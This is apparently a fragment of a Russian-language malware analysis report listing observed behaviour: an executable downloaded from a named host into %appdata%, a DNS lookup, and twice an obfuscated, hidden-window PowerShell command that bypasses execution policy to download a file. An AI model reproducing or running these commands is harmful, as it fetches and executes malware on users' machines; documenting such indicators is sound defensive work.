Техническая информация
- http://1impresion.com/foma1502_2_cr0.exe как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pOW^E^r^S^h^eLL^.^e^XE ^-^Ex^E^cUtIOnpOlICY ^b^yPASS -^nOp^ro^Fi^l^E ^-wINdOWsTyl^e h^IDde^n^ (^Ne^W-OB^JEc^t SySTe^M.Net^.W^EbCl^IEnT^).do^w^N^LoA^DFILE^(^'http://1impresion...
- DNS ASK 1i###esion.com
- '<SYSTEM32>\cmd.exe' /c "pOW^E^r^S^h^eLL^.^e^XE ^-^Ex^E^cUtIOnpOlICY ^b^yPASS -^nOp^ro^Fi^l^E ^-wINdOWsTyl^e h^IDde^n^ (^Ne^W-OB^JEc^t SySTe^M.Net^.W^EbCl^IEnT^).do^w^N^LoA^DFILE^(^'http://1impresion...' (со скрытым окном)